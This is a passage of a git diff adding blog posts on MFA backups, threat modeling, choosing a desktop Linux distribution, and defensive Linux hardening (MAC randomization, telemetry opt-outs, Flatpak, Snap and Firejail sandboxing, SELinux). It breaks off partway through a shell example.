You should always have backups for your MFA method. Hardware security keys can get lost, stolen, or simply stop working over time. It is recommended that you have a pair of hardware security keys with the same access to your accounts instead of just one.

When using TOTP with an authenticator app, be sure to back up your recovery keys to an offline and encrypted storage device.

### Weakest link

You are only as secure as the weakest authentication method you use. For instance, it makes little sense to add SMS 2FA as an alternative MFA method if you are already using FIDO2. An adversary who can compromise your SMS 2FA will get into your account just as easily as if you didn't use FIDO2 at all.

Thus, it is important to stick to the best authentication method you have access to. It is better to have two YubiKeys for FIDO2 than one FIDO2 key and one authenticator app for TOTP. Likewise, it is better to have one TOTP instance and a backup key than to use TOTP alongside Email or SMS 2FA.

98
content/posts/knowledge/Threat Modeling.md
Normal file
@ -0,0 +1,98 @@
---
title: "Threat Modeling"
date: 2022-07-18
tags: ['Knowledge Base', 'Privacy', 'Security']
author: Tommy
---

The first task for a person taking steps to protect their privacy and security is to make a threat model.

## Defining a threat



To make a threat model, we must first define a threat. A common mistake made by people who are just getting into the privacy space is to define the threat as "big-tech companies." There is a fundamental problem with this definition:

Why do we not trust "big-tech companies," but then shift our trust to "small-tech companies"? What happens if those "small-tech companies" turn out to be malicious? What happens when our favorite "small-tech company" becomes successful and grows exponentially? **The proper way to define the threat here is the "service provider," not "big-tech."**

Generally, there are four primary threats a person would want to protect themselves from:

- A service provider spying on their users
- Cross site/service tracking and data sharing, a.k.a. "mass surveillance"
- An app developer spying on users through their malicious software
- A hacker trying to get into the users' computers

A typical person would have several of these threats in their threat model. Some of these threats may weigh more than others. For example, a software developer would have a hacker stealing their source code, signing keys, and secrets as their primary threat, but beyond that they would also want privacy from the websites they visit and so on. Likewise, an average Joe may have mass surveillance and service providers as their primary threats, but beyond that they also need decent security to prevent a hacker from stealing their data.

For whistleblowers, the threat model is much more extreme. Beyond what is mentioned above, they also need anonymity. On top of hiding what they do and what data they have, and not getting hacked by hackers or governments, they also have to hide who they are.

## Privacy from service providers

In most setups, our "private" messages, emails, social interactions are typically stored on a server somewhere. The obvious problem with this is that the service provider (or a hacker who has compromised the server) can look into your "private" conversations whenever and however they want, without you ever knowing. This applies to many common services like SMS messaging, Telegram, Discord, and so on.

With end-to-end encryption, you can alleviate this issue by encrypting communications between you and your desired recipients before they are even sent to the server. The confidentiality of your messages is guaranteed, so long as the service provider does not have access to the private keys of either party.
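
As a minimal sketch of that principle (using the third-party `cryptography` package, with a pre-shared key standing in for a real key-agreement protocol), encryption and decryption happen only on the endpoints, and the server only ever handles ciphertext:

```
from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()  # known only to the two endpoints
cipher = Fernet(key)

# On the sender's device:
ciphertext = cipher.encrypt(b"meet at noon")

# The service provider stores and forwards only this opaque blob.

# On the recipient's device:
assert cipher.decrypt(ciphertext) == b"meet at noon"
```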

In practice, the effectiveness of different end-to-end encryption implementations varies. Applications such as Signal run natively on your device, and every copy of the application is the same across different installations. If the service provider were to backdoor their application in an attempt to steal your private keys, that could later be detected using reverse engineering.

On the other hand, web-based end-to-end encryption implementations such as Proton Mail's webmail or Bitwarden's web vault rely on the server dynamically serving JavaScript code to the browser to handle cryptographic operations. A malicious server could target a specific user and send them malicious JavaScript code to steal their encryption key, and it would be extremely hard for the user to ever notice such a thing. Even if the user does notice the attempt to steal their key, it would be incredibly hard to prove that it is the provider trying to do so, because the server can choose to serve different web clients to different users.

Therefore, when relying on end-to-end encryption, you should choose to use native applications over web clients whenever possible.

Even with end-to-end encryption, service providers can still profile you based on **metadata**, which is typically not protected. While the service provider could not read your messages to see what you're saying, they can still observe things like who you're talking to, how often you message them, and what times you're typically active. Protection of metadata is fairly uncommon, and you should pay close attention to the technical documentation of the software you are using to see if there is any metadata minimization or protection at all, if that is a concern for you.

## Protection from cross site/service tracking

You can be tracked across websites and services using some form of identifiers. These are typically:

- Your IP address
- Browser cookies
- Your browser fingerprint
- Data you submit to websites
- Payment method correlation

Your goals should be to segregate your online identities from each other, to blend in with other people, and simply to avoid giving out identifying information to anyone as much as possible.

Instead of relying on privacy policies (which are promises that could be violated), try to obfuscate your information in such a way that it is very difficult for different providers to correlate data with each other and build a profile on you. This could come in the form of using encryption tools like Cryptomator prior to uploading your data to cloud services, using prepaid cards or cryptocurrency to protect your credit/debit card information, using a VPN to hide your IP address from websites and services on the internet, etc. The privacy policy should only be relied upon as a last resort, when you have exhausted all of your options for true privacy and need to put complete trust in your service provider.

Bear in mind that companies can hide their ownership or share your information with data brokers, even if they are not in the advertising business. Thus, it makes little sense to solely focus on the "ad-tech" industry as a threat in your threat model. Rather, it makes a lot more sense to protect yourself from service providers as a whole, and any kind of corporate surveillance threat that most people are concerned about will be thwarted along with the rest.

## Limiting Public Information

The best way to ensure your data is private is to simply not put it out there in the first place. Deleting information you find about yourself online is one of the best first steps you can take to regain your privacy.

On sites where you do share information, checking the privacy settings of your account to limit how widely that data is spread is very important. For example, if your accounts have a "private mode," enable it to make sure your account isn't being indexed by search engines and can't be viewed by people you don't vet beforehand.

If you have already submitted your real information to a number of sites which shouldn't have it, consider employing disinformation tactics such as submitting fictitious information related to the same online identity to make your real information indistinguishable from the false information.

## Protection from malware and hackers



You need security to obtain any semblance of privacy: **Using tools which appear private is futile if they could easily be exploited by attackers to release your data later.**

When it comes to application security, we generally do not (and sometimes cannot) know if the software that we use is malicious, or might one day become malicious. Even with the most trustworthy developers, there is generally no guarantee that their software does not have a serious vulnerability that could later be exploited.

To minimize the potential damage that a malicious piece of software can do, you should employ security by compartmentalization. This could come in the form of using different computers for different jobs, using virtual machines to separate different groups of related applications, or using a secure operating system with a strong focus on application sandboxing and mandatory access control.

Mobile operating systems are generally safer than desktop operating systems when it comes to application sandboxing. Apps cannot obtain root access and only have access to system resources which you grant them.
|
||||
|
||||
Desktop operating systems generally lag behind on proper sandboxing. ChromeOS has similar sandboxing properties to Android, and macOS has full system permission control and opt-in (for developers) sandboxing for applications, however these operating systems do transmit identifying information to their respective OEMs. Linux tends to not submit information to system vendors, but it has poor protection against exploits and malicious apps. This can be mitigated somewhat with specialized distributions which make heavy use of virtual machines or containers, such as Qubes OS.

Web browsers, email clients, and office applications all typically run untrusted code sent to you from third parties. Running multiple virtual machines to separate applications like these from your host system, as well as from each other, is one technique you can use to prevent an exploit in these applications from compromising the rest of your system. Technologies like Qubes OS or Microsoft Defender Application Guard on Windows provide convenient methods to do this seamlessly, for example.

If you are concerned about physical attacks you should use an operating system with a secure verified boot implementation, such as Android, iOS, ChromeOS, or macOS. You should also make sure that your drive is encrypted, and that the operating system uses a TPM or Secure [Enclave](https://support.apple.com/guide/security/secure-enclave-sec59b0b31ff/1/web/1) or [Secure Element](https://developers.google.com/android/security/android-ready-se) for rate limiting attempts to enter the encryption passphrase. You should avoid sharing your computer with people you don't trust, because most desktop operating systems do not encrypt data separately per-user.

## Bad Practices

As a beginner, you may often fall into some bad practices while making a threat model. These include:

- Solely focusing on advertising networks instead of service providers as a whole
- Heavy reliance on privacy policies
- Blindly shifting trust from one service provider to another
- Heavy reliance on badness enumeration for privacy instead of systematically solving the problem
- Blindly trusting open-source software

As discussed, focusing solely on advertising networks and relying solely on privacy policies does not make up a sensible threat model. When switching away from a service provider, try to determine what the root problem is and see if your new provider has any technical solution to the problem. For example, you may not like Google Drive as it means giving Google access to all of your data. The underlying problem here is the lack of end-to-end encryption, which you can solve by using an encryption tool like Cryptomator or by switching to a provider that provides it out of the box, like Proton Drive. Blindly switching from Google Drive to a provider that does not provide end-to-end encryption, like Murena Cloud, does not make sense.

You should also keep in mind that [badness enumeration does not work, cannot work, has never worked, and will never work](/knowledge/badness-enumeration/). While things like ad blockers and antiviruses may help block the low-hanging fruit, they can never fully protect you from the threat. On the other hand, they often increase your attack surface and are not worth the security sacrifice. At best, they are merely convenience tools and should not be thought of as part of a defense strategy.

Another thing to keep in mind is that open-source software is not automatically private or secure. Malicious code can be sneaked into the package by the developer of the project, contributors, library developers, or the person who compiles the code. Beyond that, sometimes a piece of open-source software may have worse security properties than its proprietary counterpart. An example of this would be traditional Linux desktops lacking verified boot, system integrity protection, and full system access control for apps when compared to macOS. When doing threat modeling, it is vital that you evaluate the privacy and security properties of each piece of software being used, rather than just blindly trusting it because it is open-source.

7
content/posts/knowledge/_index.md
Normal file
@@ -0,0 +1,7 @@
---
title: Knowledge Base
ShowReadingTime: false
ShowWordCount: false
---

A collection of posts about general privacy and security knowledge

107
content/posts/linux/Choosing Your Desktop Linux Distribution.md
Normal file
@@ -0,0 +1,107 @@
---
title: "Choosing Your Desktop Linux Distribution"
date: 2022-07-17
tags: ['Operating Systems', 'Linux', 'Security']
author: Tommy
---

Not all Linux distributions are created equal. When choosing a Linux distribution, there are several things you need to keep in mind.

## Release Cycle

You should choose a distribution which stays close to the stable upstream software releases, typically rolling release distributions. This is because frozen release cycle distributions often don’t update package versions and fall behind on security updates.

For frozen distributions, package maintainers are expected to backport patches to fix vulnerabilities (Debian is one such [example](https://www.debian.org/security/faq#handling)) rather than bump the software to the “next version” released by the upstream developer. Some security fixes [do not](https://arxiv.org/abs/2105.14565) receive a [CVE](https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures) at all (particularly for less popular software) and therefore do not make it into the distribution with this patching model. As a result, minor security fixes are sometimes held back until the next major release.

In fact, in certain cases, there have been vulnerabilities introduced by Debian because of their patching process. [Bug 1633467](https://bugzilla.mozilla.org/show_bug.cgi?id=1633467) and [DSA-1571](https://www.debian.org/security/2008/dsa-1571) are examples of this.

![Upstream / Distros Gap](/images/upstream-distros-gap.png)

Holding packages back and applying interim patches is generally not a good idea, as it diverges from the way the developer might have intended the software to work. [Richard Brown](https://rootco.de/aboutme/) has a presentation about this:

{{< youtube id="i8c0mg_mS7U">}}

## Traditional and Atomic updates

Traditionally, Linux distributions update by sequentially updating the desired packages. Traditional updates such as those used in Fedora, Arch Linux, and Debian-based distributions can be less reliable if an error occurs while updating.

Atomic updating distributions apply updates in full or not at all. Typically, transactional update systems are also atomic.

A transactional update system creates snapshots before and after an update is applied. If an update fails at any time (perhaps due to a power failure), the update can be easily rolled back to a “last known good state.”
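
For example, on an rpm-ostree based distribution, each update is staged as a new deployment while the previous one is kept for rollback. A minimal sketch (assuming an rpm-ostree system such as Fedora Silverblue):

```bash
# Show the current and previous deployments
rpm-ostree status

# Stage an update as a new atomic deployment (takes effect on reboot)
rpm-ostree upgrade

# If the new deployment misbehaves, boot back into the previous one
rpm-ostree rollback
```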

[Adam Šamalík](https://twitter.com/adsamalik) has a presentation with `rpm-ostree` in action:

{{< youtube id="-hpV5l-gJnQ">}}

Even if you are worried about the stability of the system because of regularly updated packages (which you shouldn't be), it makes more sense to use a system which you can safely update and roll back than an outdated distribution like Debian, which is partially made up of unreliable backported packages and lacks an easy rollback mechanism in case something goes wrong.

## Arch-based Distributions

Arch Linux has very up-to-date packages with minimal downstream patching. That being said, Arch-based distributions are not recommended for those new to Linux, regardless of the distribution. Arch does not have a distribution update mechanism for the underlying software choices. As a result, you have to stay aware of current trends and adopt technologies on your own as they supersede older practices.

For a secure system, you are also expected to have sufficient Linux knowledge to properly set up security for your system, such as adopting a [mandatory access control](https://en.wikipedia.org/wiki/Mandatory_access_control) system, setting up [kernel module](https://en.wikipedia.org/wiki/Loadable_kernel_module#Security) blacklists, hardening boot parameters, manipulating [sysctl](https://en.wikipedia.org/wiki/Sysctl) parameters, and knowing what components you need, such as [Polkit](https://en.wikipedia.org/wiki/Polkit).

If you are experienced with Linux and wish to use an Arch-based distribution, you should use Arch Linux proper, not any of its derivatives. Here are some examples of why that is the case:

- **Manjaro**: This distribution holds packages back for 2 weeks to make sure that their own changes do not break, not to make sure that upstream is stable. When AUR packages are used, they are often built against the latest [libraries](https://en.wikipedia.org/wiki/Library_(computing)) from Arch’s repositories.
- **Garuda**: They use [Chaotic-AUR](https://aur.chaotic.cx/) which automatically and blindly compiles packages from the AUR. There is no verification process to make sure that the AUR packages don’t suffer from supply chain attacks.

## Kicksecure

While you should not use outdated distributions like Debian, if you decide to use it, it would be a good idea to [convert](https://www.kicksecure.com/wiki/Debian) it into [Kicksecure](https://www.kicksecure.com/). Kicksecure, in oversimplified terms, is a set of scripts, configurations, and packages that substantially reduce the attack surface of Debian. It covers a lot of privacy and hardening recommendations by default.

## “Security-focused” Distributions

There is often some confusion about “security-focused” distributions and “pentesting” distributions. A quick search for “the most secure Linux distribution” will often give results like Kali Linux, Black Arch and Parrot OS. These distributions are offensive penetration testing distributions that bundle tools for testing other systems. They don’t include any “extra security” or defensive mitigations intended for regular use.

## Linux-libre Kernel and “Libre” Distributions

**Do not** use the Linux-libre kernel, since it [removes security mitigations](https://www.phoronix.com/scan.php?page=news_item&px=GNU-Linux-Libre-5.7-Released) and [suppresses kernel warnings](https://news.ycombinator.com/item?id=29674846) about vulnerable microcode for ideological reasons.

If you want to use one of these distributions for reasons other than ideology, you should make sure that there is a way to easily obtain, install, and update a proper kernel and missing firmware. For example, if you are looking to use [GUIX](https://guix.gnu.org/en/download/), you should absolutely use something like the [Nonguix](https://gitlab.com/nonguix/nonguix) repository and get all of the fixes as mentioned above.

## Wayland

You should use a desktop environment that supports the [Wayland](https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)) display protocol, as it was developed with security [in mind](https://lwn.net/Articles/589147/). Its predecessor, [X11](https://en.wikipedia.org/wiki/X_Window_System), does not support GUI isolation, allowing any window to [record the screen, and log and inject inputs in other windows](https://blog.invisiblethings.org/2011/04/23/linux-security-circus-on-gui-isolation.html), making any attempt at sandboxing futile. While there are options to do nested X11 such as [Xpra](https://en.wikipedia.org/wiki/Xpra) or [Xephyr](https://en.wikipedia.org/wiki/Xephyr), they often come with performance penalties, are not convenient to set up, and are not preferable to Wayland.

Fortunately, common environments such as [GNOME](https://www.gnome.org), [KDE](https://kde.org), and the window manager [Sway](https://swaywm.org) have support for Wayland. Some distributions like Fedora and Tumbleweed use it by default, and some others may do so in the future as X11 is in [hard maintenance mode](https://www.phoronix.com/scan.php?page=news_item&px=X.Org-Maintenance-Mode-Quickly). If you’re using one of those environments it is as easy as selecting the “Wayland” session at the desktop display manager ([GDM](https://en.wikipedia.org/wiki/GNOME_Display_Manager), [SDDM](https://en.wikipedia.org/wiki/Simple_Desktop_Display_Manager)).

Try **not** to use desktop environments or window managers that do not have Wayland support such as Cinnamon (default on Linux Mint), Pantheon (default on Elementary OS), MATE, Xfce, and i3. If you are using i3, consider switching to [Sway](https://swaywm.org), which is a drop-in replacement with Wayland support as mentioned above.

## Recommended Distributions

Here is a quick, non-authoritative list of distributions that are generally better than others:

### Fedora Workstation

![Fedora](/images/fedora.png)

[Fedora Workstation](https://getfedora.org/en/workstation/) is a great general purpose Linux distribution, especially for those who are new to Linux. It is a semi-rolling release distribution. While some packages like GNOME are frozen until the next Fedora release, most packages (including the kernel) are updated frequently throughout the lifespan of the release. Each Fedora release is supported for one year, with a new version released every 6 months.

With that, Fedora generally adopts newer technologies before other distributions, e.g. [Wayland](https://wayland.freedesktop.org/), [PipeWire](https://pipewire.org/), and soon, [FS-Verity](https://fedoraproject.org/wiki/Changes/FsVerityRPM). These new technologies often come with improvements in security, privacy, and usability in general.

While lacking transactional or atomic updates, Fedora's package manager, `dnf`, has a great rollback and undo feature that is generally missing from other package managers. You can read more about it on [Red Hat's documentation](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/managing_software_with_the_dnf_tool/assembly_handling-package-management-history_managing-software-with-the-dnf-tool).
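
As a quick sketch of what this looks like in practice (the transaction ID is hypothetical):

```bash
# List recent dnf transactions
sudo dnf history list

# Inspect a specific transaction (42 is a hypothetical ID)
sudo dnf history info 42

# Undo that transaction, reversing the package changes it made
sudo dnf history undo 42
```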

### Fedora Silverblue & Kinoite

[Fedora Silverblue](https://silverblue.fedoraproject.org/) and [Fedora Kinoite](https://kinoite.fedoraproject.org/) are immutable variants of Fedora with a strong focus on container workflows. Silverblue comes with the [GNOME](https://www.gnome.org/) desktop environment while Kinoite comes with [KDE](https://kde.org/). Silverblue and Kinoite follow the same release schedule as Fedora Workstation, benefiting from the same fast updates and staying very close to upstream.

You can refer to the video by [Adam Šamalík](https://twitter.com/adsamalik) linked [above](#traditional-and-atomic-updates) on how these distributions work.

### openSUSE Tumbleweed and MicroOS

These are Fedora Workstation and Silverblue's European counterparts: rolling-release, fast-updating distributions with [transactional updates](https://kubic.opensuse.org/blog/2018-04-04-transactionalupdates/) using [Btrfs](https://en.wikipedia.org/wiki/Btrfs) and [Snapper](https://en.opensuse.org/openSUSE:Snapper_Tutorial).

[MicroOS](https://microos.opensuse.org/) has a much smaller base system than [Tumbleweed](https://get.opensuse.org/tumbleweed) and mounts the running Btrfs subvolumes as read-only (hence its name and why it is considered an immutable distribution). Currently, it is still in beta, so bugs are to be expected. Nevertheless, it is an awesome project.

{{< youtube id="jcl_4Vh6qP4">}}

### Whonix

[Whonix](https://www.whonix.org/) is a distribution focused on anonymity based on [Kicksecure](https://www.whonix.org/wiki/Kicksecure). It is meant to run as two virtual machines: a “Workstation” and a Tor “Gateway.” All communications from the Workstation must go through the Tor gateway. This means that even if the Workstation is compromised by malware of some kind, the true IP address remains hidden. It is currently the best solution that I know of if your threat model requires anonymity.

Some of its features include Tor Stream Isolation, [keystroke anonymization](https://www.whonix.org/wiki/Keystroke_Deanonymization#Kloak), [boot clock randomization](https://www.kicksecure.com/wiki/Boot_Clock_Randomization), [encrypted swap](https://github.com/Whonix/swap-file-creator), hardened boot parameters, hardened kernel settings, and a [hardened memory allocator](https://www.kicksecure.com/wiki/Hardened_Malloc). One downside of Whonix is that it still inherits outdated packages with lots of downstream patching from Debian.

Future versions of Whonix will likely include [full system AppArmor policies](https://github.com/Whonix/apparmor-profile-everything) and a [sandbox app launcher](https://www.whonix.org/wiki/Sandbox-app-launcher) to fully confine all processes on the system.

Although Whonix is best used [in conjunction with Qubes](https://www.whonix.org/wiki/Qubes/Why_use_Qubes_over_other_Virtualizers), Qubes-Whonix has [various disadvantages](https://forums.whonix.org/t/qubes-whonix-security-disadvantages-help-wanted/8581) when compared to other hypervisors.

399
content/posts/linux/Desktop-Linux-Hardening.md
Normal file
@@ -0,0 +1,399 @@
---
title: "Desktop Linux Hardening"
date: 2022-08-17
tags: ['Operating Systems', 'Linux', 'Privacy', 'Security']
author: Tommy
---

Linux is [not](/posts/os/linux-insecurities) a secure operating system. However, there are steps you can take to harden it, reduce its attack surface and improve its privacy.

**Before We Start**...

This guide is largely based on [Madaidan's Linux hardening guide](https://madaidans-insecurities.github.io/guides/linux-hardening.html); however, it does take into account usability and ease of maintenance of each recommendation. The goal is to produce a guide that intermediate to advanced Linux users can reasonably follow to set up and maintain the security configurations. It will also **not** try to be distribution agnostic, and there will be many distribution specific recommendations.

Some of the sections will include mentions of unofficial builds of packages like `linux-hardened`, `lkrg-akmod`, `hardened-malloc`, and so on. These are not endorsements. They are merely there to show you that you have an option to easily obtain and update these packages. Using unofficial builds of packages means adding more parties to trust, and you have to evaluate whether it is worth doing so for the potential privacy or security benefits or not.



## During Installation

### Drive Encryption

Most Linux distributions have an option within their installer for enabling [LUKS](../encryption.md#linux-unified-key-setup) full disk encryption. If this option isn’t set at installation time, you will have to back up your data and re-install, as encryption is applied after [disk partitioning](https://en.wikipedia.org/wiki/Disk_partitioning) but before [file systems](https://en.wikipedia.org/wiki/File_system) are formatted.

### Encrypted Swap

Consider using [encrypted swap](https://wiki.archlinux.org/title/Dm-crypt/Swap_encryption) or [ZRAM](https://wiki.archlinux.org/title/Swap#zram-generator) instead of unencrypted swap to avoid potential security issues with sensitive data being pushed to [swap space](https://en.wikipedia.org/wiki/Memory_paging). While ZRAM can be set up post-installation, if you want to use encrypted swap, you should set it up while partitioning your drive.

Depending on your distribution, encrypted swap may be automatically set up if you choose to encrypt your drive. Fedora [uses ZRAM by default](https://fedoraproject.org/wiki/Changes/SwapOnZRAM), regardless of whether you enable drive encryption or not.

## Privacy Tweaks

### NetworkManager Trackability Reduction

Most desktop Linux distributions including Fedora, openSUSE, Ubuntu, and so on come with [NetworkManager](https://en.wikipedia.org/wiki/NetworkManager) by default to configure Ethernet and Wi-Fi settings.

WfKe9vLwSvv7rN has a detailed guide on [trackability reduction with NetworkManager](/posts/os/networkmanager-trackability-reduction/) and I highly recommend that you check it out.

In short, if you use NetworkManager, add the following to your `/etc/NetworkManager/conf.d/00-macrandomize.conf`:
```
[device]
wifi.scan-rand-mac-address=yes

[connection]
wifi.cloned-mac-address=random
ethernet.cloned-mac-address=random
```

Next, disable transient hostname management by adding the following to your `/etc/NetworkManager/conf.d/01-transient-hostname.conf`:

```
[main]
hostname-mode=none
```

Then, restart your NetworkManager service:

```bash
sudo systemctl restart NetworkManager
```

Finally, set your hostname to `localhost`:

```bash
sudo hostnamectl hostname "localhost"
```
Note that randomizing Wi-Fi MAC addresses depends on support from the Wi-Fi card firmware.

### Other Identifiers

There are other system identifiers which you may wish to be careful about. You should give this some thought to see if it applies to your [threat model](/posts/knowledge/threat-modeling/):

- **Usernames:** Similarly, your username is used in a variety of ways across your system. Consider using generic terms like "user" rather than your actual name.
- **Machine ID:** During installation a unique machine ID is generated and stored on your device. Consider [setting it to a generic ID](https://madaidans-insecurities.github.io/guides/linux-hardening.html#machine-id), as sketched below.
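
As a sketch, checking and overwriting the machine ID could look like the following. The generic value here is the widely shared Whonix ID cited in Madaidan's guide; verify it against the guide before using it:

```bash
# View the current machine ID
cat /etc/machine-id

# Replace it with a widely shared generic ID (value taken from Madaidan's guide; verify before use)
echo 'b08dfa6083e7567a1921a715000001fb' | sudo tee /etc/machine-id

# Keep the D-Bus copy in sync, as some software reads it instead
sudo ln -sf /etc/machine-id /var/lib/dbus/machine-id
```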

### System Counting

Many Linux distributions send some telemetry data by default to count how many systems are using their software. Consider disabling this depending on your threat model.

The Fedora Project does this by [counting](https://fedoraproject.org/wiki/Changes/DNF_Better_Counting) how many unique systems access its mirrors by using a [`countme`](https://fedoraproject.org/wiki/Changes/DNF_Better_Counting#Detailed_Description) variable instead of a unique ID.

This [option](https://dnf.readthedocs.io/en/latest/conf_ref.html#options-for-both-main-and-repo) is currently off by default. However, you could add `countme=false` to `/etc/dnf/dnf.conf` just in case it is enabled in the future. On systems that use rpm-ostree such as Fedora Silverblue or Kinoite, the `countme` option can be disabled by masking the [rpm-ostree-countme](https://fedoramagazine.org/getting-better-at-counting-rpm-ostree-based-systems/) timer.

openSUSE uses a [unique ID](https://en.opensuse.org/openSUSE:Statistics) to count systems, which can be disabled by deleting the `/var/lib/zypp/AnonymousUniqueId` file.

Zorin OS uses the `zorin-os-cencus` package, which also uses a [unique ID](https://zorin.com/legal/privacy/) to count systems. You can opt out of this by doing `sudo apt purge zorin-os-census`, and optionally hold it with `sudo apt-mark hold zorin-os-census` to avoid accidentally installing it in the future.

[Snapd](https://github.com/snapcore/snapd) assigns a [unique ID](https://snapcraft.io/docs/snap-store-metrics) to your snapd installation and uses it for telemetry. While this is generally not a problem, if your threat model calls for anonymity, you should not be using snap packages, and you should remove snapd from your Ubuntu installation. Like with the Zorin census, on Debian-based distributions, and especially Ubuntu, consider holding `snapd` with `sudo apt-mark hold snapd`.

Of course, this is a non-exhaustive list of how different Linux distributions do this. If you are aware of any other tracking mechanisms that different distributions use, feel free to make a [pull request](https://github.com/PrivSec-dev/privsec.dev/blob/main/content/posts/linux/Linux-Desktop-Hardening.md) or [discussion post](https://github.com/PrivSec-dev/privsec.dev/discussions) detailing them!

### Keystroke Anonymization

You could be [fingerprinted based on soft biometric traits](https://www.whonix.org/wiki/Keystroke_Deanonymization) when you use the keyboard. The [Kloak](https://github.com/vmonaco/kloak) package could help you mitigate this threat. It is available as a .deb package from [Kicksecure's repository](https://www.kicksecure.com/wiki/Packages_for_Debian_Hosts) and an [AUR package](https://aur.archlinux.org/packages/kloak-git).

With that being said, if your threat model calls for using something like Kloak, you are probably better off just using Whonix.

## Application Confinement

Some sandboxing solutions for desktop Linux distributions do exist; however, they are not as strict as those found in macOS or ChromeOS. Applications installed from the package manager (`dnf`, `apt`, etc.) typically have **no** sandboxing or confinement whatsoever. Below are a few projects that aim to solve this problem:

### Flatpak

{{< youtube id="GkgPIJp8_30">}}

[Flatpak](https://flatpak.org) aims to be a universal package manager for Linux. One of its main goals is to provide a universal package format which can be used in most Linux distributions. It provides some [permission control](https://docs.flatpak.org/en/latest/sandbox-permissions.html). With that being said, Flatpak sandboxing is [quite weak](https://madaidans-insecurities.github.io/linux.html#flatpak).

You can restrict applications further by issuing [Flatpak overrides](https://docs.flatpak.org/en/latest/flatpak-command-reference.html#flatpak-override). This can be done with the command-line or by using [Flatseal](https://flathub.org/apps/details/com.github.tchx84.Flatseal). Some sample overrides are provided by [me](https://github.com/tommytran732/Flatpak-Overrides) and [rusty-snake](https://github.com/rusty-snake/kyst/tree/main/flatpak). Note that this only helps with the lax high-level default permissions, but cannot solve low-level issues like `/proc` and `/sys` access, or an insufficient seccomp blacklist.

Some sensitive permissions you should pay attention to:

- the Network (`--share=network`) socket (internet access)
- the PulseAudio socket (`--socket=pulseaudio`) for audio and sound
- `--device=all` access to all devices including the camera
- `--talk-name=org.freedesktop.secrets` dbus (access to secrets stored on your keychain) for applications which do not need it
If an application works natively with Wayland (*not* running through the [XWayland](https://wayland.freedesktop.org/xserver.html) compatibility layer), consider revoking its access to the X11 (`--socket=x11`) and [inter-process communications (IPC)](https://en.wikipedia.org/wiki/Unix_domain_socket) socket (`--share=ipc`) as well.
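
As a sketch, such an override could look like this (the application ID is hypothetical):

```bash
# Revoke X11 and IPC sharing for an app that runs natively on Wayland
flatpak override --user --nosocket=x11 --unshare=ipc org.example.App
```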
Many Flatpak apps come with broad filesystem permissions such as `--filesystem=home` and `--filesystem=host`. Some applications implement the [Portal API](https://docs.flatpak.org/en/latest/portal-api-reference.html), which allows a file manager to pass files to the Flatpak application (e.g. VLC) without specific filesystem access privileges. Despite this, many of them, including ones like VLC [still use](https://github.com/flathub/org.videolan.VLC/blob/master/org.videolan.VLC.json) `--filesystem=host`.
My strategy to deal with this is to revoke all filesystem access first, then test if an application works without it. If it does, it means the app is already using Portals and I don't need to do anything else. If it doesn't, then I start granting permission to specific directories.
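
A rough sketch of that workflow on the command line (again with a hypothetical application ID):

```bash
# Revoke broad filesystem access, then test whether the app still works
flatpak override --user --nofilesystem=host --nofilesystem=home org.example.App

# If something breaks, grant access back to specific directories only
flatpak override --user --filesystem=~/Documents org.example.App

# Review what the app ends up with
flatpak override --user --show org.example.App
```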

As odd as this may sound, **you should not do unattended updates with your Flatpak packages**. The problem with Flatpak is that it grants install-time permissions when you update your applications, and you will not be notified of the permission change if you or your app store simply execute `flatpak update -y`. Using automatic updates with `gnome-software` is fine, as it will not update packages with permission changes, and you have to manually open its update tab to apply the update.

### Snap

Snap is another universal package manager with some sandboxing support. It is developed by Canonical and heavily pushed on Ubuntu.

Snap packages come in [two variants](https://snapcraft.io/docs/snap-confinement): classic snap with no confinement and strict snap with confinement on systems with AppArmor and Cgroupsv1. If a snap package is classic snap, you are better off using a version provided by your distribution's repository instead, if one is available. If your system does not have AppArmor, then you are better off not using snap at all. Most modern systems outside of Ubuntu and its derivatives only use Cgroupsv2 by default, so you have to set `systemd.unified_cgroup_hierarchy=0` in your kernel parameters to get Cgroupsv1 working.

Snap permissions can be managed via the Snap Store or Ubuntu's custom patched GNOME Control Center.

One caveat with Snap packages is that you only have control over the interfaces declared in their manifests. For example, snap has separate interfaces for `audio-playback` and `audio-record`; however, some packages will only declare the legacy `pulseaudio` interface which grants them permission to both play and record audio. Likewise, some applications may work perfectly fine with Wayland, but the package maintainer may only declare the X11 interface in their manifest. For these cases, you need to reach out to the maintainer of the Snap package to update the manifest accordingly.
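
You can inspect and manage these interfaces from the command line; something like the following should work (the snap name and interface are just examples):

```bash
# List the interfaces a snap declares and their connection state
snap connections firefox

# Disconnect an interface you do not want the snap to have
sudo snap disconnect firefox:audio-record
```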

### Firejail

{{< youtube id="N-Mso2bSr3o">}}

[Firejail](https://firejail.wordpress.com/) is another method of sandboxing. As it is a large [setuid](https://en.wikipedia.org/wiki/Setuid) binary, it has a large attack surface which may assist in [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation).

Madaidan [provided](https://madaidans-insecurities.github.io/linux.html#firejail) additional details on how Firejail can worsen the security of your device.

If you do use Firejail, there is a tool called [Firetools](https://github.com/netblue30/firetools) which can help you quickly manage what an application can have access to and launch them. Note that the configurations made by `Firetools` are temporary, and it does not provide you with an option to save a profile for long-term use.

Firejail can also confine X11 windows using Xpra or Xephyr, something that Flatpak and Snap cannot do. I highly recommend that you check out their [documentation](https://firejail.wordpress.com/documentation-2/x11-guide/) on how to set this up.
One trick to consistently launch applications which have a Firejail profile confined is to use the `sudo firecfg` command. This will create a symlink in `/usr/local/bin/app_name_here` pointing to Firejail. `.desktop` files which do not specifically specify the absolute path of the binaries to use will launch the application through the symlink and have Firejail sandbox them this way. Of course, this is bypassable if you or some other applications launch the application directly from `/usr/bin/app_name_here` instead.
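
A short sketch of setting this up and verifying the result:

```bash
# Create symlinks in /usr/local/bin for all applications with Firejail profiles
sudo firecfg

# Verify that the symlinks point at Firejail
ls -l /usr/local/bin | grep firejail
```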

### Mandatory Access Control

Common Linux [Mandatory access control](https://en.wikipedia.org/wiki/Mandatory_access_control) frameworks require policy files in order to force constraints on the system.

The two main control systems are [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) (used on Android and Fedora-based distributions) and [AppArmor](https://en.wikipedia.org/wiki/AppArmor) (used on Debian-based distributions and most openSUSE variants).

Fedora includes SELinux preconfigured with some policies that will confine [system daemons](https://en.wikipedia.org/wiki/Daemon_(computing)) (background processes). You should keep it in Enforcing mode.
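
You can quickly check this on a Fedora system:

```bash
# Should print "Enforcing"
getenforce

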